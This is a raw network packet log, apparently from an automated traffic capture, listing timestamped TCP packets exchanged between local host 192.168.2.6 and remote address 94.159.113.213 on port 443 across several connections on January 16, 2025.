                        Jan 16, 2025 06:02:03.353387117 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.353411913 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.353512049 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.353600979 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.353699923 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.353729010 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.353740931 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.353785992 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.353830099 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.354249954 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.354290962 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.354372978 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.354372978 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.354387999 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.354543924 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.354590893 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.354640007 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.354652882 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.354690075 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.354748011 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.404110909 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.404158115 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.404212952 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.404273033 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.404319048 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.404386044 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.404889107 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.404928923 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.404978037 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.404990911 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.405040026 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.405204058 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.440790892 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.440834999 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.440999031 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.440999985 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.441066027 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.441159010 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.441164970 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.441185951 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.441237926 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.441267014 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.441318035 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.441329956 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.441374063 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.441467047 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.441606045 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.441646099 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.441694021 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.441705942 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.441731930 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.441818953 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.442051888 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.442090988 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.442142010 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.442152977 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.442199945 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.442222118 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.477431059 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.477478981 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.477524996 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.477545977 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.477602005 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.477602005 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.477693081 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.477736950 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.477781057 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.477792025 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.477823973 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.477864027 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.492616892 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.492660046 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.492731094 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.492799997 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.492849112 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.493011951 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.493376970 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.493416071 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.493463039 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.493474960 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.493505955 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.493573904 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.529341936 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.529375076 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.529438972 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.529476881 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.529511929 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.529583931 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.530010939 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.530034065 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.530090094 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.530101061 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.530145884 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.530157089 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.530220985 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.530328989 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.530467987 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.530488968 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.530529976 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.530540943 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.530580997 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.530711889 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.531212091 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.531239986 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.531281948 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.531292915 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.531332016 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.531378031 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.531672001 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.531699896 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.531804085 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.531804085 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.531819105 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.531924963 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.537117004 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.537137032 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.537326097 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.537395000 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.539592028 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.566337109 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.566381931 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.566433907 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.566447020 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.566484928 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.566502094 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.581357002 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.581403971 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.581482887 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.581482887 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.581499100 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.581722975 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.582078934 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.582129002 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.582175970 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.582187891 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.582212925 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.582262993 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.583327055 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.618030071 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.618084908 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.618133068 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.618148088 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.618175030 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.618195057 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.618352890 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.618426085 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.618451118 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.618484974 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.618522882 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.618542910 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.618688107 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.618772984 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.818511009 CET4434971494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.818618059 CET49714443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.819061041 CET49714443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.819080114 CET4434971494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.819263935 CET49714443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.819276094 CET4434971494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.975688934 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.975717068 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.975773096 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.975802898 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.975816965 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.977844000 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.113497972 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.113523006 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.113579988 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.113600969 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.113615990 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.113641024 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.123511076 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.123583078 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.143300056 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.143337011 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.143366098 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.143373966 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.143409014 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.143418074 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.269653082 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.269680023 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.269730091 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.269758940 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.269773006 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.269815922 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.271420956 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.271440983 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.271487951 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.271493912 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.271529913 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.271539927 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.291300058 CET4434971494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.291496992 CET49714443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.291511059 CET4434971494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.291578054 CET49714443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.307210922 CET49714443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.307246923 CET4434971494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.321360111 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.321387053 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.321429968 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.321435928 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.321469069 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.321481943 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.364980936 CET49716443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.365014076 CET4434971694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.365179062 CET49716443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.365569115 CET49716443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.365582943 CET4434971694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.397816896 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.397869110 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.397902966 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.397922039 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.397942066 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.397964001 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.398719072 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.398741961 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.398771048 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.398777962 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.398802042 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.398824930 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.399866104 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.399898052 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.399925947 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.399933100 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.399957895 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.399976969 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.448837042 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.448868036 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.448909998 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.448926926 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.448970079 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.524385929 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.524411917 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.524457932 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.524468899 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.524491072 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.524512053 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.524823904 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.524842978 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.524873972 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.524908066 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.524913073 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.524965048 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.526158094 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.526194096 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.526274920 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.526282072 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.526340008 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.527210951 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.527230024 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.527270079 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.527276039 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.527297974 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.527317047 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.528299093 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.528318882 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.528362036 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.528367996 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.528387070 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.528403044 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.575901985 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.575932980 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.575963020 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.575968981 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.576010942 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.576952934 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.576973915 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.576999903 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.577007055 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.577028036 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.577060938 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.652784109 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.652820110 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.652939081 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.652939081 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.652946949 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.653657913 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.653683901 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.653691053 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.653702974 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.653717995 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.653820038 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.654593945 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.654613972 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.654653072 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.654658079 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.654681921 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.655535936 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.655565977 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.655572891 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.655595064 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.655596018 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.655622959 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.655627966 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.655649900 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.656425953 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.656451941 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.656496048 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.656496048 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.656502962 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.656527042 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.656857967 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.656882048 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.656913042 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.656922102 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.656943083 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.656992912 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.664218903 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.664241076 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.664355040 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.664355040 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.664364100 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.664438009 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.703011036 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.703033924 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.703181982 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.703181982 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.703190088 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.705816031 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.741266012 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.741290092 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.741419077 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.741419077 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.741430998 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.741560936 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.779680967 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.779701948 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.779840946 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.779840946 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.779856920 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.780236006 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.780260086 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.780268908 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.780277967 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.780296087 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.780797005 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.780817032 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.780834913 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.780843973 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.780870914 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.781474113 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.781497002 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.781505108 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.781519890 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.781538963 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.781538963 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.781831980 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.782052040 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.782077074 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.782109976 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.782118082 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.782140017 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.784666061 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.784689903 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.784765005 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.784765005 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.784771919 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.789819002 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.791484118 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.791503906 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:04.791578054 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:04.791578054 CET49713443192.168.2.694.159.113.213
